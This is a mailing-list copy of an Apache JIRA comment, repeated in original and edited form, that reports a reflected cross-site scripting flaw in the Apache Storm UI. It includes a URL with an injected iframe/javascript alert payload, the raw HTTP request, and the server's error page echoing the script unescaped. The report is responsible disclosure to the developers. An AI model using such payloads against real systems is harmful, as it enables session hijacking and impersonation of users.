[jira] [Comment Edited] (STORM-408) Cross-Site Scripting security vulnerability

Anand Krishnan (JIRA) Thu, 17 Jul 2014 14:04:51 -0700

    [ 
https://issues.apache.org/jira/browse/STORM-408?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14065533#comment-14065533
 ]


Anand Krishnan edited comment on STORM-408 at 7/17/14 9:03 PM:
---------------------------------------------------------------

These Cross-site Scripting security vulnerabilities are manifest in the Storm 
UI specifically. They were discovered using a commercial security tool that 
injects various attack vectors into the HTTP request and analyzes the response.

For example, changing the following HTTP GET request URL: (*NOTE: actual server 
name was changed to _server_name_ )

{{http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332}}

by changing the end of parameter: {{1402681332}} 
to: {{1402681332%3Ciframe%20src=javascript:alert(1342)%20}}

{{http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20}}

_Test HTTP Request and Response:_

{code}
GET 
/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; 
Trident/6.0)
Connection: Keep-Alive
DNT: 1
Host: server_name:8080
Cookie: sys=true
{code}

{code}
HTTP/1.1 500 Internal Server Error
Date: Wed, 18 Jun 2014 19:37:01 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3183
Server: Jetty(6.1.26)
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" 
"http://www.w3.org/TR/html4/strict.dtd";>
<html><head><title>Storm UI</title><link href="/css/bootstrap-1.1.0.css" 
rel="stylesheet"
type="text/css"><link href="/css/style.css" rel="stylesheet" 
type="text/css"><script
src="/js/jquery-1.6.2.min.js" type="text/javascript"></script><script
src="/js/jquery.tablesorter.min.js" type="text/javascript"></script><script
src="/js/jquery.cookies.2.2.0.min.js" type="text/javascript"></script><script 
src="/js/script.js"
type="text/javascript"></script></head><body><h1><a href="/">Storm 
UI</a></h1><h2>Internal Server
Error</h2><pre>NotAliveException(msg:PROCESS_STATUS_TOPOLOGY-3-1402681332<iframe
src=javascript:alert(1342) )
at 
backtype.storm.generated.Nimbus$getTopologyInfo_result.read(Nimbus.java:11330)
at org.apache.thrift7.TServiceClient.receiveBase(TServiceClient.java:78)
at backtype.storm.generated.Nimbus$Client.recv_getTopologyInfo(Nimbus.java:474)
at backtype.storm.generated.Nimbus$Client.getTopologyInfo(Nimbus.java:461)
at backtype.storm.ui.core$topology_page.invoke(core.clj:481)
at backtype.storm.ui.core$fn__7877.invoke(core.clj:745)
at compojure.core$make_route$fn__3855.invoke(core.clj:93)
at compojure.core$if_route$fn__3843.invoke(core.clj:39)
at compojure.core$if_method$fn__3836.invoke(core.clj:24)
at compojure.core$routing$fn__3861.invoke(core.clj:106)
at clojure.core$some.invoke(core.clj:2390)
at compojure.core$routing.doInvoke(core.clj:106)
at clojure.lang.RestFn.applyTo(RestFn.java:139)
at clojure.core$apply.invoke(core.clj:603)
at compojure.core$routes$fn__3865.invoke(core.clj:111)
at ring.middleware.reload$wrap_reload$fn__7170.invoke(reload.clj:14)
at backtype.storm.ui.core$catch_errors$fn__7912.invoke(core.clj:798)
at
ring.middleware.keyword_params$wrap_keyword_params$fn__4391.invoke(keyword_params.clj:27)
at 
ring.middleware.nested_params$wrap_nested_params$fn__4428.invoke(nested_params.clj:65)
at ring.middleware.params$wrap_params$fn__4365.invoke(params.clj:55)
at
ring.middleware.multipart_params$wrap_multipart_params$fn__4454.invoke(multipart_params.clj:103)
at ring.middleware.flash$wrap_flash$fn__4729.invoke(flash.clj:14)
at ring.middleware.session$wrap_session$fn__4720.invoke(session.clj:43)
at ring.middleware.cookies$wrap_cookies$fn__4657.invoke(cookies.clj:160)
at ring.adapter.jetty$proxy_handler$fn__4204.invoke(jetty.clj:16)
at 
ring.adapter.jetty.proxy$org.mortbay.jetty.handler.AbstractHandler$0.handle(Unknown
Source)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at
org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:928)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:549)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at 
org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
</pre></body></html>
{code}

The test result seems to indicate a vulnerability because commercial security 
tool successfully embedded a script in the response, which will be executed 
when the page loads in the user's browser.

Let me know if this is the type of detail you were interested in.




was (Author: akrishnan4doittnyc):
These Cross-site Scripting security vulnerabilities are manifest in the Storm 
UI specifically. They were discovered using a commercial security tool that 
injects various attack vectors into the HTTP request and analyzes the response.

For example, changing the following HTTP GET request URL: (*NOTE: actual server 
name was changed to _server_name_ )

{{http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332}}

by changing the end of parameter: {{1402681332}} 
to: {{1402681332%3Ciframe%20src=javascript:alert(1342)%20}}

{{http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20}}

_Test HTTP Request and Response:_

{code}
GET 
/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332%3Ciframe%20src=javascript:alert(1342)%20
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://server_name:8080/topology/PROCESS_STATUS_TOPOLOGY-3-1402681332
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; 
Trident/6.0)
Connection: Keep-Alive
DNT: 1
Host: server_name:8080
Cookie: sys=true
{code}

{code}
HTTP/1.1 500 Internal Server Error
Date: Wed, 18 Jun 2014 19:37:01 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3183
Server: Jetty(6.1.26)
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" 
"http://www.w3.org/TR/html4/strict.dtd";>
<html><head><title>Storm UI</title><link href="/css/bootstrap-1.1.0.css" 
rel="stylesheet"
type="text/css"><link href="/css/style.css" rel="stylesheet" 
type="text/css"><script
src="/js/jquery-1.6.2.min.js" type="text/javascript"></script><script
src="/js/jquery.tablesorter.min.js" type="text/javascript"></script><script
src="/js/jquery.cookies.2.2.0.min.js" type="text/javascript"></script><script 
src="/js/script.js"
type="text/javascript"></script></head><body><h1><a href="/">Storm 
UI</a></h1><h2>Internal Server
Error</h2><pre>NotAliveException(msg:PROCESS_STATUS_TOPOLOGY-3-1402681332<iframe
src=javascript:alert(1342) )
at 
backtype.storm.generated.Nimbus$getTopologyInfo_result.read(Nimbus.java:11330)
at org.apache.thrift7.TServiceClient.receiveBase(TServiceClient.java:78)
at backtype.storm.generated.Nimbus$Client.recv_getTopologyInfo(Nimbus.java:474)
at backtype.storm.generated.Nimbus$Client.getTopologyInfo(Nimbus.java:461)
at backtype.storm.ui.core$topology_page.invoke(core.clj:481)
at backtype.storm.ui.core$fn__7877.invoke(core.clj:745)
at compojure.core$make_route$fn__3855.invoke(core.clj:93)
at compojure.core$if_route$fn__3843.invoke(core.clj:39)
at compojure.core$if_method$fn__3836.invoke(core.clj:24)
at compojure.core$routing$fn__3861.invoke(core.clj:106)
at clojure.core$some.invoke(core.clj:2390)
at compojure.core$routing.doInvoke(core.clj:106)
at clojure.lang.RestFn.applyTo(RestFn.java:139)
at clojure.core$apply.invoke(core.clj:603)
at compojure.core$routes$fn__3865.invoke(core.clj:111)
at ring.middleware.reload$wrap_reload$fn__7170.invoke(reload.clj:14)
at backtype.storm.ui.core$catch_errors$fn__7912.invoke(core.clj:798)
at
ring.middleware.keyword_params$wrap_keyword_params$fn__4391.invoke(keyword_params.clj:27)
at 
ring.middleware.nested_params$wrap_nested_params$fn__4428.invoke(nested_params.clj:65)
at ring.middleware.params$wrap_params$fn__4365.invoke(params.clj:55)
at
ring.middleware.multipart_params$wrap_multipart_params$fn__4454.invoke(multipart_params.clj:103)
at ring.middleware.flash$wrap_flash$fn__4729.invoke(flash.clj:14)
at ring.middleware.session$wrap_session$fn__4720.invoke(session.clj:43)
at ring.middleware.cookies$wrap_cookies$fn__4657.invoke(cookies.clj:160)
at ring.adapter.jetty$proxy_handler$fn__4204.invoke(jetty.clj:16)
at 
ring.adapter.jetty.proxy$org.mortbay.jetty.handler.AbstractHandler$0.handle(Unknown
Source)
at org.mortbay.jetty.handler.HandlerWrapper.handle(HandlerWrapper.java:152)
at org.mortbay.jetty.Server.handle(Server.java:326)
at org.mortbay.jetty.HttpConnection.handleRequest(HttpConnection.java:542)
at
org.mortbay.jetty.HttpConnection$RequestHandler.headerComplete(HttpConnection.java:928)
at org.mortbay.jetty.HttpParser.parseNext(HttpParser.java:549)
at org.mortbay.jetty.HttpParser.parseAvailable(HttpParser.java:212)
at org.mortbay.jetty.HttpConnection.handle(HttpConnection.java:404)
at 
org.mortbay.jetty.bio.SocketConnector$Connection.run(SocketConnector.java:228)
at org.mortbay.thread.QueuedThreadPool$PoolThread.run(QueuedThreadPool.java:582)
</pre></body></html>
{code}

The test result seems to indicate a vulnerability because commercial security 
tool successfully embedded
a script in the response, which will be executed when the page loads in the 
user's browser.

Let me know if this is the type of detail you were interested in.



> Cross-Site Scripting security vulnerability
> -------------------------------------------
>
>                 Key: STORM-408
>                 URL: https://issues.apache.org/jira/browse/STORM-408
>             Project: Apache Storm (Incubating)
>          Issue Type: Bug
>    Affects Versions: 0.9.3-incubating
>         Environment: Java
>            Reporter: Anand Krishnan
>              Labels: security
>             Fix For: 0.9.3-incubating, feature-security
>
>
> There are Cross-Site Scripting security vulnerabilities in Apache Storm.
> The risk is that it is possible to steal or manipulate customer session and 
> cookies, which might be used to impersonate a legitimate user, allowing the 
> hacker to view or alter user records, and to perform transactions as that 
> user.
> The reason is that sanitation of hazardous characters was not performed 
> correctly on user input.



--
This message was sent by Atlassian JIRA
(v6.2#6252)

[jira] [Comment Edited] (STORM-408) Cross-Site Scripting security vulnerability

Reply via email to